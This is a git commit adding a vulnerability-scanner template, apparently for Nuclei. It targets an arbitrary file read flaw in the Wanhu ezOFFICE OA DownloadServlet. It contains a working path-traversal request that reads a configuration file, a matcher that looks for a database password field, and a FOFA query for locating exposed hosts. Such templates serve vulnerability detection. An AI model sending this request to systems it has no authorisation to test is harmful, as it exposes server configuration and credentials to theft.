Added wanhuoa-DownloadServlet-LFI Template
parent
e69c9d4e2d
commit
aa4c02b0eb
|
@ -0,0 +1,31 @@
|
|||
id: wanhuoa-DownloadServlet-LFI
|
||||
|
||||
info:
|
||||
name: wanhuoa DownloadServlet LFI
|
||||
author: wp
|
||||
severity: high
|
||||
description: |
|
||||
万户OA DownloadServlet接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的敏感文件,获取敏感信息 | The DownloadServlet interface has any file read vulnerability. Attackers can read sensitive files on the server and obtain sensitive information through this vulnerability
|
||||
reference:
|
||||
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: app="万户网络-ezOFFICE"
|
||||
tags: oa,wanhu,LFI,high
|
||||
http:
|
||||
- raw:
|
||||
- |+
|
||||
GET /defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
|
||||
Connection: close
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code_1 == 200 && contains(body_1,'ccerp.password')"
|
||||
condition: and
|
Loading…
Reference in New Issue